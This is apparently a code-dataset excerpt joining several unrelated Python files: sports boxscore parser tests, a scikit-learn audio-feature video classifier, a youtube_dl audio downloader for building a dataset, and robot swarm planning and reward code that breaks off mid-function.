fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_short_handed_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_short_handed_assists == 1
def test_invalid_home_short_handed_assits_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=0)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._home_short_handed_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_short_handed_assists == 1
def test_invalid_url_returns_none(self):
result = Boxscore(None)._retrieve_html_page('')
assert result is None
def test_regular_season_information(self):
fields = {
'date': 'October 5, 2017',
'playoff_round': None,
'time': '7:00 PM',
'attendance': 17565,
'arena': 'TD Garden',
'duration': '2:39'
}
mock_field = """October 5, 2017, 7:00 PM
Attendance: 17,565
Arena: TD Garden
Game Duration: 2:39
Logos via Sports Logos.net / About logos
"""
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_playoffs_information(self):
fields = {
'date': 'June 7, 2018',
'playoff_round': 'Stanley Cup Final',
'time': '8:00 PM',
'attendance': 18529,
'arena': 'T-Mobile Arena',
'duration': '2:45'
}
mock_field = """June 7, 2018, 8:00 PM
Stanley Cup Final
Attendance: 18,529
Arena: T-Mobile Arena
Game Duration: 2:45
Logos via Sports Logos.net / About logos
"""
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_no_game_information(self):
fields = {
'date': '',
'playoff_round': None,
'time': None,
'attendance': None,
'arena': None,
'duration': None
}
mock_field = '\n'
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_limited_game_information(self):
fields = {
'date': 'June 7, 2018',
'playoff_round': 'Stanley Cup Final',
'time': None,
'attendance': None,
'arena': 'T-Mobile Arena',
'duration': None
}
mock_field = """June 7, 2018
Stanley Cup Final
Arena: T-Mobile Arena
Logos via Sports Logos.net / About logos
"""
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_away_shutout_single_goalies(self):
shutout = ['1', '0']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._away_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_shutout == 1
def test_away_shutout_multiple_goalies(self):
shutout = ['0', '1', '0']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_shutout == 1
def test_away_shutout_multiple_goalies_empty_field(self):
shutout = ['', '1', '0']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_shutout == 1
def test_home_shutout_single_goalies(self):
shutout = ['0', '1']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_shutout == 1
def test_home_shutout_multiple_goalies(self):
shutout = ['0', '0', '1']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_shutout == 1
def test_home_shutout_multiple_goalies_empty_field(self):
shutout = ['0', '', '1']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_shutout == 1
def test_away_saves_single_goalies(self):
saves = ['29', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._away_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_saves == 29
def test_away_saves_multiple_goalies_empty_field(self):
saves = ['29', '3', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_saves == 32
def test_away_saves_multiple_goalies_empty_field(self):
saves = ['29', '', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_saves == 29
def test_home_saves_single_goalies(self):
saves = ['29', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_saves == 30
def test_home_saves_multiple_goalies_empty_field(self):
saves = ['29', '3', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_saves == 33
def test_home_saves_multiple_goalies_empty_field(self):
saves = ['29', '30', '']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_saves == 30
def test_away_save_percentage(self):
fake_saves = PropertyMock(return_value=30)
fake_shots_on_goal = PropertyMock(return_value=33)
type(self.boxscore).away_saves = fake_saves
type(self.boxscore).home_shots_on_goal = fake_shots_on_goal
assert self.boxscore.away_save_percentage == 0.909
def test_away_save_percentage_zero_shots(self):
fake_saves = PropertyMock(return_value=0)
fake_shots_on_goal = PropertyMock(return_value=0)
type(self.boxscore).away_saves = fake_saves
type(self.boxscore).home_shots_on_goal = fake_shots_on_goal
assert self.boxscore.away_save_percentage == 0.0
def test_home_save_percentage(self):
fake_saves = PropertyMock(return_value=30)
fake_shots_on_goal = PropertyMock(return_value=33)
type(self.boxscore).home_saves = fake_saves
type(self.boxscore).away_shots_on_goal = fake_shots_on_goal
assert self.boxscore.home_save_percentage == 0.909
def test_home_save_percentage_zero_shots(self):
fake_saves = PropertyMock(return_value=0)
fake_shots_on_goal = PropertyMock(return_value=0)
type(self.boxscore).home_saves = fake_saves
type(self.boxscore).away_shots_on_goal = fake_shots_on_goal
assert self.boxscore.home_save_percentage == 0.0
def test_no_class_information_returns_dataframe_of_none(self):
mock_goals = PropertyMock(return_value=None)
type(self.boxscore)._away_goals = mock_goals
type(self.boxscore)._home_goals = mock_goals
assert self.boxscore.dataframe is None
class TestMLBBoxscores:
@patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
flexmock(Boxscores) \
.should_receive('_get_team_details') \
.and_return((None, None, None, None, None, None))
flexmock(Boxscores) \
.should_receive('_find_games') \
.and_return(None)
self.boxscores = Boxscores(None)
def test_improper_loser_boxscore_format_skips_game(self):
mock_html = pq("""<table class="teams">
<tbody>
<tr class="loser">
<td class="right">1</td>
<td class="right gamelink">
</td>
</tr>
<tr class="winner">
<td><a href="/teams/DET/2019.html">Detroit Red Wings</a></td>
<td class="right">3</td>
<td class="right">
</td>
</tr>
</tbody>
</table>""")
games = self.boxscores._extract_game_info([mock_html])
assert len(games) == 0
def test_improper_winner_boxscore_format_skips_game(self):
mock_html = pq("""<table class="teams">
<tbody>
<tr class="loser">
<td><a href="/teams/LAK/2019.html">Los Angeles Kings</a></td>
<td class="right">1</td>
<td class="right gamelink">
<a href="/boxscores/201812100DET.html">Final</a>
</td>
</tr>
<tr class="winner">
<td class="right">3</td>
<td class="right">
</td>
</tr>
</tbody>
</table>""")
games = self.boxscores._extract_game_info([mock_html])
assert len(games) == 0
``` |
{
"source": "JosephDevaney/FYP",
"score": 3
} |
#### File: JosephDevaney/FYP/Classification.py
```python
from sklearn import tree
from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
from sklearn import svm
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from sklearn.cross_validation import StratifiedKFold
from sklearn.cross_validation import cross_val_score
from sklearn.cross_validation import cross_val_predict
from sklearn.feature_selection import f_classif
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import SelectPercentile
from sklearn.decomposition import PCA
from sklearn.decomposition import TruncatedSVD
from sklearn.decomposition import KernelPCA
from sklearn.decomposition import RandomizedPCA
from hmmlearn import hmm
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
import numpy as np
import scipy.fftpack as fft
from VideoFeatures import VideoFeatures
import WnLFeatures as wnl
import pickle as pkl
import time
import gc
# These should be loaded from the config file
CONF_FILE = "config.txt"
REG_FEATS = "features.ftr"
SHORT_FEATS = "features30sec.ftr"
# This function takes instantiates the desired Classification object and returns it
# If the options are not loaded the user is prompted for the decision
def get_classifier_from_cmd(cls=None):
if cls is None:
print("Please select the number that corresponds to the desired Classifier:")
print("1. Decision Tree")
print("2. Naive Bayes")
print("3. SVM")
print("4. kNN")
print("5. Random Forest")
cls = int(input())
cls_opts = [x for x in cls.split('|')]
cls = int(cls_opts[0])
if cls == 1:
classifier = tree.DecisionTreeClassifier(criterion="entropy")
elif cls == 2:
# NB
# classifier = GaussianNB()
# classifier = MultinomialNB()
classifier = BernoulliNB()
elif cls == 3:
# SVM
opts = [x for x in cls_opts[1].split('$')]
gm = 'auto'
if opts[0] in ['rbf', 'poly', 'sigmoid']:
if opts[2] != 'auto':
gm = float(opts[2])
classifier = svm.SVC(kernel=opts[0], decision_function_shape=opts[1], gamma=gm)
elif cls == 4:
opts = [x for x in cls_opts[1].split('$')]
classifier = KNeighborsClassifier(n_neighbors=int(opts[0]), algorithm='ball_tree', weights=opts[1], leaf_size=int(opts[2]))
elif cls == 5:
classifier = RandomForestClassifier(criterion="entropy")
return classifier
# This function builds the matrix of features per instance and returns it.
# Pads individual features with 0's to ensure each instance has the same number of columns/features
# Tracks the columns that will have a feature reduction applied and the amount this will be.
def get_feature_choice_cmd(ftr=None, ftr_sel=None, path=None, cls=None, win_len=None):
if ftr is None:
print("Please select the feature (Separated by | for multiple):")
print("1. Beat Variance Ratio")
print("2. Silence Ratio")
print("3. MFCC")
print("4. MFCC Delta")
print("5. Chromagram")
print("6. Spectroid")
print("7. FFT average over 1s window")
print("8. ZCR over window")
print("9. MFCC over window")
ftr = input()
# ftr = [int(x) for x in ftr.split('|')]
ftr = [opts.split('$')[0] for opts in ftr.split('|')]
ftr_sel = {opts.split('$')[0]: opts.split('$')[1] for opts in ftr.split('|')}
if path is None:
path = input("Enter path to features: \n")
if cls is None:
cls = ["Entertainment", "Music", "Comedy", "Film & Animation", "News & Politics", "Sports", "People & Blogs",
"Howto & Style", "Pets & Animals"]
if win_len is None:
win_len = 0.04
start = True
# features = np.empty(shape=(0, 0))
features = {}
f_max_len = {}
classes = {}
# Path is an array containing potentially multiple features files that can be used to load Video objects from disk.
for p in path:
with open(p + SHORT_FEATS, "rb") as inp:
unpickle = pkl.Unpickler(inp)
count = 0
# Create the UnPickler object and loop until there are no objects left in the file. Break from loop then.
while True:
try:
cur_feature = {}
vid = unpickle.load()
# If video is in the approved class list add all selected features to a dictionary cur_feature
if vid.get_category_from_name() in cls:
count += 1
if 1 in ftr:
cur_feature[1] = vid.bvratio
if 2 in ftr:
cur_feature[2] = vid.silence_ratio
if 3 in ftr:
cur_feature[3] = np.array(vid.mfcc).reshape((1, -1))[0]
if 4 in ftr:
cur_feature[4] = np.array(vid.mfcc_delta).reshape((1, -1))[0]
if 5 in ftr:
cur_feature[5] = np.array(vid.chromagram).reshape((1, -1))[0]
if 6 in ftr:
cur_feature[6] = vid.spectroid[0]
if 7 in ftr:
cur_feature[7] = vid.get_windowed_fft(int(np.ceil(vid.rate * win_len)))
if 8 in ftr:
cur_feature[8] = vid.get_windowed_zcr(int(np.ceil(vid.rate * win_len)))
if 9 in ftr:
cur_feature[9] = np.array(wnl.get_window_mfcc(vid.mfcc, int(np.ceil(vid.rate * win_len)))) \
.reshape((1, -1))[0]
# This section was designed under the assumption that the features could be returned in various
# 2d layouts. It essentially checks the size of the current feature against the largest
# number of columns so far. It then pads the smaller one with 0's
# This can definitely be refactored into simpler, more readable code.
if start:
for i in ftr:
features[i] = np.array([cur_feature[i]])
f_shape = features[i].shape
if hasattr(cur_feature[i], "__len__"):
if len(f_shape) > 1:
f_max_len[i] = f_shape[1]
else:
f_max_len[i] = len(f_shape)
start = False
# classes = np.array(vid.get_category_from_name())
classes[i] = [vid.get_category_from_name()]
else:
for i in ftr:
if hasattr(cur_feature[i], "__len__"):
if len(cur_feature[i].shape) > 1:
if cur_feature[i].shape[1] > f_max_len[i]:
if len(features[i].shape) > 1:
features[i] = np.pad(features[i],
((0, 0), (0, cur_feature[i].shape[1] - f_max_len[i])),
mode="constant")
f_max_len[i] = cur_feature[i].shape[1]
else:
features[i] = np.pad(features[i],
(0, cur_feature[i].shape[1] - f_max_len[i]),
mode="constant")
f_max_len[i] = cur_feature[i].shape[1]
elif cur_feature[i].shape[1] < f_max_len[i]:
cur_feature[i] = np.pad(cur_feature[i],
((0, 0), (0, f_max_len[i] - cur_feature[i].shape[1])),
mode="constant")
elif len(cur_feature[i].shape) == 1:
if cur_feature[i].shape[0] > f_max_len[i]:
if len(features[i].shape) > 1:
features[i] = np.pad(features[i],
((0, 0), (0, cur_feature[i].shape[0] - f_max_len[i])),
mode="constant")
f_max_len[i] = cur_feature[i].shape[0]
else:
features[i] = np.pad(features[i],
(0, cur_feature[i].shape[0] - f_max_len[i]),
mode="constant")
f_max_len[i] = cur_feature[i].shape[0]
elif cur_feature[i].shape[0] < f_max_len[i]:
cur_feature[i] = np.pad(cur_feature[i],
(0, f_max_len[i] - cur_feature[i].shape[0]),
mode="constant")
features[i] = np.vstack((features[i], [cur_feature[i]]))
# classes = np.append(classes, [vid.get_category_from_name()])
classes[i].append(vid.get_category_from_name())
except EOFError:
print("EOF")
break
except TypeError:
print("Unable to load object")
except pkl.UnpicklingError:
print("Unable to load object2")
gc.collect()
# Join each feature into one large array.
# Keep track of the indices for each feature that needs reduction applied later
select_ind = []
print("Count = ", count)
total_feature = features[ftr[0]]
if ftr_sel[ftr[0]] > 0:
select_ind = [(0, len(total_feature[0]), ftr_sel[ftr[0]])]
for i in range(1, len(ftr)):
if ftr_sel[ftr[i]] > 0:
start = len(total_feature[0])
select_ind.append((start, start + len(features[ftr[i]][0]), ftr_sel[ftr[i]]))
total_feature = np.hstack((total_feature, features[ftr[i]]))
# targets = np.array(classes)
targets = [value for key, value in classes.items()]
return total_feature, targets[0], select_ind
# Apply the feature selection to the features matrix as necessary.
def feature_selection(features, select_ind, targets):
start_sel = True
last_ind = 0
feat2 = features
for inds in select_ind:
# If this is the first loop check if the first feature to be reduced is not the first index.
# If so add all features up to that point to an array and track the original indices also
# Do the same if it is not the first loop, but the next reduce index is > the last index
if start_sel:
if inds[0] > 0:
feat2 = features[:, 0:inds[0]]
total_supp = np.arange(0, inds[0])
# total_supp = np.ones(inds[0], dtype=bool)
start_sel = False
last_ind = inds[0]
elif inds[0] > last_ind:
feat2 = np.hstack((feat2, features[:, last_ind:inds[0]]))
total_supp = np.hstack((total_supp, np.arange(last_ind, inds[0] + 1)))
# total_supp = np.hstack((total_supp, np.ones((inds[0]-last_ind), dtype=bool)))
# Get the number of columns to retain and create object
size = (inds[1] - inds[0]) / inds[2]
skb = SelectKBest(score_func=f_classif, k=size)
# skb = SelectPercentile(score_func=f_classif, percentile=inds[2])
# slice out the columns relating to the current feature
f = features[:, inds[0]:inds[1]]
# Return an array of the selected features. Get the indices and add them to an array
f_select = skb.fit_transform(f, targets)
# skb.fit(f, targets)
# f_select = skb.transform(f)
f_supp = skb.get_support(indices=True)
f_supp += last_ind
if start_sel:
feat2 = f_select
total_supp = f_supp
start_sel = False
else:
feat2 = np.hstack((feat2, f_select))
total_supp = np.hstack((total_supp, f_supp))
last_ind = inds[1]
return feat2, total_supp
# Perform PCA on the desired features
def feature_reduction_fit(features, select_ind, red_pca, fit=False):
start_sel = True
last_ind = 0
feat2 = features
for inds in select_ind:
if start_sel:
if inds[0] > 0:
feat2 = features[:, 0:inds[0]]
start_sel = False
elif inds[0] > last_ind:
feat2 = np.hstack((feat2, features[:, last_ind:inds[0]]))
# If this is the training set, fit the data to the object before transforming.
# If its not then just transform
# Create the new array and return it and the PCA objects
if fit:
red_pca[inds[0]].fit(features[:, inds[0]:inds[1]])
f_reduct = red_pca[inds[0]].transform(features[:, inds[0]:inds[1]])
if start_sel:
feat2 = f_reduct
start_sel = False
else:
feat2 = np.hstack((feat2, f_reduct))
last_ind = inds[1]
return feat2, red_pca
def main():
clf_choice = None
ftr_choice = None
ftr_sel = None
win_len = None
path = []
opts = []
cls_choice = []
# If the config.txt file exists, extract the options from it.
try:
opts = [line.strip('\n') for line in open(CONF_FILE)]
clf_choice = opts[0]
use_cv = int(opts[1].split('$')[0])
num_folds = int(opts[1].split('$')[1])
ftr_choice = [int(opts.split('$')[0]) for opts in opts[2].split('|')]
ftr_sel = {int(opts.split('$')[0]): int(opts.split('$')[1]) for opts in opts[2].split('|')}
# ftr_choice, ftr_sel = [int(x), int(y) for x, y in setting.split('$') for settings in ftr_settings]
win_len = float(opts[3])
reduction_choice = int(opts[4])
path = [f for f in opts[5].split('$')]
cls_choice = [x for x in opts[6].split('|')]
Num_tests = int(opts[7])
except FileNotFoundError:
use_cv = int(input("Enter 1 to use Stratified Kfold CV: \n"))
clf = get_classifier_from_cmd(clf_choice)
features, targets, select_ind = get_feature_choice_cmd(ftr=ftr_choice, ftr_sel=ftr_sel, path=path, cls=cls_choice,
win_len=win_len)
numtest = {}
train_t = []
test_t = []
test_ind = []
train_ind = []
print("*****Starting to Test*****")
# In practice this option is never taken
if use_cv != 1:
for i in range(0, len(targets)):
t = targets[i]
if t not in numtest:
numtest[t] = 0
if numtest[t] < 2:
test_ind.append(i)
test_t.append(targets[i])
numtest[t] += 1
else:
train_ind.append(i)
train_t.append(targets[i])
train_f = features[train_ind]
# train_t = targets[train_ind]
test_f = features[test_ind]
# test_t = targets[test_ind]
# train_f = features
# train_t = targets
# test_f = features
# test_t = targets
# clf = clf.fit(features[: int(len(features)/10)], targets[: int(len(features)/10)])
# predictions = clf.predict(features[- int(len(features)/10):], targets[- int(len(features)/10):])
clf = clf.fit(train_f, train_t)
predictions = clf.predict(test_f)
print("Accuracy is : " + str(accuracy_score(test_t, predictions)))
print("----------------------------")
print("Confusion Matrix: ")
print(confusion_matrix(test_t, predictions))
print("\n\n")
else:
# perform total classification for the specified number of iterations
for _ in range(Num_tests):
skf = StratifiedKFold(targets, n_folds=num_folds)
# result = cross_val_score(clf, features, targets, cv=skf)
filename = time.strftime("Tests\\%Y_%m_%d__%H_%M_%S", time.gmtime()) + '.txt'
savefile = open(filename, 'w+')
if opts is not []:
savefile.write("Options for this experiment are as follows: \n")
savefile.write(str(opts) + '\n\n')
# savefile.write("Total Accuracy: %0.2f (+/- %0.2f)\n\n" % (result.mean(), result.std() * 2))
# preds = cross_val_predict(clf, features, targets, cv=skf)
# cor_preds = targets[skf]
start_cls = True
total_targets = []
total_preds = []
for train_i, test_i in skf:
# print("Predicted: " + preds[i] + "\t|\tCorrect Class: " + cor_preds[i])
train_target = [targets[x] for x in train_i]
train_feats = features[train_i]
# Choose Selection or PCA reduction
if reduction_choice == 1:
train_feats, train_supp = feature_selection(features[train_i], select_ind, train_target)
elif reduction_choice == 2:
reduct_pca = {}
for inds in select_ind:
size = int((inds[1] - inds[0]) / inds[2])
reduct_pca[inds[0]] = PCA(size)
# reduct_pca[inds[0]] = TruncatedSVD(n_components=size)
# reduct_pca[inds[0]] = KernelPCA(n_components=size, kernel='linear')
# reduct_pca[inds[0]] = RandomizedPCA(n_components=size)
train_feats, reduct_pca = feature_reduction_fit(features[train_i], select_ind, reduct_pca, fit=True)
# Fit the model to the training data
clf = clf.fit(train_feats, train_target)
# Prepare the test data in the same format as the training data
test_target = [targets[x] for x in test_i]
test_feats = features[test_i, :]
if reduction_choice == 1:
test_feats = test_feats[:, train_supp]
elif reduction_choice == 2:
test_feats, reduct_pca = feature_reduction_fit(features[test_i], select_ind, reduct_pca)
# Test the model of test set. Calculate the Accuracy Score and Confusion Matrix
# Accuracy score will have the mean of all results calculated. CM will be summed.
preds = clf.predict(test_feats)
sc = accuracy_score(test_target, preds)
cm = confusion_matrix(test_target, preds)
if start_cls:
total_confusion = cm
total_score = sc
start_cls = False
else:
total_confusion += cm
total_score += sc
total_targets.extend(test_target)
total_preds.extend(preds)
acc = str(accuracy_score(test_target, preds))
# gc.collect()
# print("Took out the trash!!")
# savefile.write("Accuracy is : " + acc)
# savefile.write("\n----------------------------\n")
# savefile.write("Confusion Matrix: \n")
# savefile.write(str(cm))
# savefile.write('\n\n')
#
# savefile.write("%-25s %s\n" % ("Target", "Prediction"))
# savefile.write("----------------------------------\n")
# [savefile.write("%-25s %s\n" % (c1, c2)) for c1, c2 in zip(test_target, preds[test_i])]
# savefile.write('\n\n')
avg_score = total_score / num_folds
savefile.write("Total Accuracy: %0.10f \n\n" % avg_score)
savefile.write("Summed CMs\n--------------------\n")
savefile.write(str(total_confusion))
# savefile.write("\n\nFinal CM from aggregate targets\n-----------------------------\n")
# savefile.write(str(confusion_matrix(total_targets, total_preds)))
unique_cls = []
[unique_cls.append(x) for x in total_targets if x not in unique_cls]
savefile.write("\n\nREPORT!!!\n-----------------------------------\n")
savefile.write(classification_report(total_targets, total_preds))
savefile.write("%-25s %s\n" % ("Target", "Prediction"))
savefile.write("----------------------------------\n")
[savefile.write("%-25s %s\n" % (c1, c2)) for c1, c2 in zip(total_targets, total_preds)]
savefile.write('\n\n')
savefile.close()
if __name__ == "__main__":
main()
# D:\Documents\DT228_4\FYP\Datasets\Test\
# D:\Documents\DT228_4\FYP\Datasets\080327\0_Audio
```
#### File: JosephDevaney/FYP/VideoDownloader.py
```python
import youtube_dl
import numpy as np
import DatasetStats as dss
import os
from VideoFeatures import VideoFeatures
YT_PREFIX = "https://www.youtube.com/watch?v="
def load_classes():
return [cl.strip('\n') for cl in open("classes.txt") if cl]
# Setup options and call the library
def download(v_id, cat, time, dir, options):
print("Starting Download of " + v_id + "***")
options['outtmpl'] = dir + '\\' + cat + '_' + v_id + '_' + time + '.%(ext)s'
options['-w'] = True
try:
with youtube_dl.YoutubeDL(options) as ydl:
ydl.download([v_id])
print("***Download Complete***")
return True
except:
print("***Unable to Download***")
return False
# Parses Text file and extracts necessary URL
# Checks for existing file at specified location and ignores duplicate files.
# Allows user to specify number of videos per class
# Currently only selects videos between 30 and 240 seconds
def main():
classes = load_classes()
datafile = input("Please enter the location of the datafile: \n")
num_vids_per_cat = int(input("Required number of videos per category : \n"))
print("Loading statistics from existing dataset")
stats = dss.analyse_features()
dss.print_stats(stats)
# stats = {}
videodata = [[val for val in line.split('\t')] for line in open(datafile) if line]
videolinks = np.array([[v[0], v[3], v[4]] for v in videodata if len(v) > 4])
savedir = input("Please enter the directory that will store the downloads: \n")
f_names = [f for f in os.listdir(savedir) if f.endswith('.wav')]
yt_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'wav',
}]
}
for video in videolinks:
vid_link = video[0]
vid_cat = video[1]
vid_len = video[2]
v_name = vid_cat + '_' + vid_link + '_' + vid_len + '.wav'
if vid_cat in classes:
if vid_cat not in stats:
stats[vid_cat] = [0, 0]
if stats[vid_cat][0] < num_vids_per_cat and v_name not in f_names and 30 <= int(vid_len) <= 240:
if download(vid_link, vid_cat, vid_len, savedir, yt_opts):
stats[vid_cat][0] += 1
stats[vid_cat][1] += int(vid_len)
dss.print_stats(stats)
if __name__ == "__main__":
main()
# D:\Documents\DT228_4\FYP\Datasets\080327\1.txt
# D:\Documents\DT228_4\FYP\Datasets\080327\0_Audio
# D:\Documents\DT228_4\FYP\Datasets\080327\0_Audio2
``` |
{
"source": "JosephDistefano/offset-human-interface",
"score": 3
} |
#### File: offset-game/envs/primitive_manager.py
```python
import numpy as np
from scipy import interpolate
from primitives.planning.planners import SkeletonPlanning
from primitives.formation.control import FormationControl
class PrimitiveManager(object):
def __init__(self, state_manager):
self.config = state_manager.config
self.state_manager = state_manager
self.planning = SkeletonPlanning(self.state_manager.config,
self.state_manager.grid_map)
self.formation = FormationControl()
return None
def set_parameters(self, primitive_info):
"""Set up the parameters of the premitive execution
Parameters
----------
primitive_info: dict
A dictionary containing information about vehicles
and primitive realted parameters.
"""
# Update vehicles
self.vehicles_id = primitive_info['vehicles_id']
if primitive_info['vehicle_type'] == 'uav':
self.vehicles = [
self.state_manager.uav[j] for j in self.vehicles_id
]
else:
self.vehicles = [
self.state_manager.ugv[j] for j in self.vehicles_id
]
self.n_vehicles = len(self.vehicles)
# Primitive parameters
self.primitive_id = primitive_info['primitive_id']
self.formation_type = primitive_info['formation_type']
self.end_pos = primitive_info['end_pos']
self.count = 0
return None
def make_vehicles_idle(self):
for vehicle in self.vehicles:
vehicle.idle = True
return None
def make_vehicles_nonidle(self):
for vehicle in self.vehicles:
vehicle.idle = False
return None
def get_centroid(self):
centroid = []
for vehicle in self.vehicles:
centroid.append(vehicle.current_pos)
centroid = np.mean(np.asarray(centroid), axis=0)
return centroid[0:2] # only x and y
def convert_pixel_ordinate(self, point, ispixel):
if not ispixel:
converted = [point[0] / 0.42871 + 145, point[1] / 0.42871 + 115]
else:
converted = [(point[0] - 145) * 0.42871,
(point[1] - 115) * 0.42871]
return converted
def get_spline_points(self):
# Perform planning and fit a spline
self.start_pos = self.centroid_pos
pixel_start = self.convert_pixel_ordinate(self.start_pos,
ispixel=False)
pixel_end = self.convert_pixel_ordinate(self.end_pos, ispixel=False)
path = self.planning.find_path(pixel_start, pixel_end, spline=False)
# Convert to cartesian co-ordinates
points = np.zeros((len(path), 2))
for i, point in enumerate(path):
points[i, :] = self.convert_pixel_ordinate(point, ispixel=True)
# Depending on the distance select number of points of the path
segment_length = np.linalg.norm(self.start_pos - self.end_pos)
n_steps = np.floor(segment_length / 200 * 250)
if points.shape[0] > 3:
tck, u = interpolate.splprep(points.T)
unew = np.linspace(u.min(), u.max(), n_steps)
x_new, y_new = interpolate.splev(unew, tck)
# points = interpcurve(250, x_new, y_new)
# x_new, y_new = points[:, 0], points[:, 1]
else:
# Find unique points
points = np.array(list(set(tuple(p) for p in points)))
f = interpolate.interp1d(points[:, 0], points[:, 1])
x_new = np.linspace(points[0, 0], points[-1, 0], 10)
y_new = f(x_new)
new_points = np.array([x_new, y_new]).T
return new_points, points
def execute_primitive(self, p_simulation):
"""Perform primitive execution
"""
primitives = [self.planning_primitive, self.formation_primitive]
done = primitives[self.primitive_id - 1]()
# Step the simulation
p_simulation.stepSimulation()
return done
def planning_primitive(self):
"""Performs path planning primitive
"""
# Make vehicles non idle
self.make_vehicles_nonidle()
done_rolling = False
if self.count == 0:
# First point of formation
self.centroid_pos = self.get_centroid()
self.next_pos = self.centroid_pos
done = self.formation_primitive()
if done:
self.count = 1
self.new_points, points = self.get_spline_points()
else:
self.centroid_pos = self.get_centroid()
distance = np.linalg.norm(self.centroid_pos - self.end_pos)
if len(self.new_points) > 2 and distance > 5:
self.next_pos = self.new_points[0]
self.new_points = np.delete(self.new_points, 0, 0)
else:
self.next_pos = self.end_pos
self.formation_primitive()
if distance < 0.5:
done_rolling = True
if done_rolling:
self.make_vehicles_idle()
return done_rolling
def formation_primitive(self):
"""Performs formation primitive
"""
if self.primitive_id == 2:
self.centroid_pos = self.end_pos
self.next_pos = self.end_pos
dt = self.config['simulation']['time_step']
self.vehicles, done = self.formation.execute(self.vehicles,
self.next_pos,
self.centroid_pos, dt,
self.formation_type)
for vehicle in self.vehicles:
vehicle.set_position(vehicle.updated_pos)
return done
```
#### File: offset-game/envs/rewards.py
```python
import numpy as np
class BenningReward(object):
def __init__(self, state_manager):
self.state_manager = state_manager
self.current_time = state_manager.current_time
self.config = state_manager.config
def get_time_dist(self, vehicle, target_pos):
"""Calculated the information of probable goal building
Parameters
---------
vehicle : vehicle class
We use the speed and current position
target_pos : array
final desired position of robot
Returns
-------
float
time to reach the target [minimum time]
"""
# Read from co-ordinate file
diff = np.asarray(vehicle.current_pos[0:2]) - np.asarray(target_pos)
distance = np.linalg.norm(diff)
if vehicle.type == 'uav':
time_to_reach = distance / vehicle.speed
elif vehicle.type == 'ugv':
time_to_reach = self.config['ugv'][
'coef_slowness'] * distance / vehicle.speed
# path_RRT = path_planning(vehicle.current_pos, target_pos)
# total_distance = np.sum(np.linalg.norm(np.diff(path_RRT)))
# time_to_reach = total_distance / vehicle.speed
return time_to_reach
def goal_information(self, goal_id, config):
"""Calculates the information of probable goal building
Parameters
----------
goal_id : int
Goal ID
config : yaml
The configuration file
Returns
-------
dict
A dictionary containing goal position, perimeter, floors,
progress, and probability
"""
# Read from co-ordinate file
node_info = self.state_manager.target_info(goal_id)
info = {}
info['goal_position'] = node_info['position']
info['perimeter'] = node_info['perimeter']
info['floors'] = node_info['n_floors']
info['goal_progress'] = 0
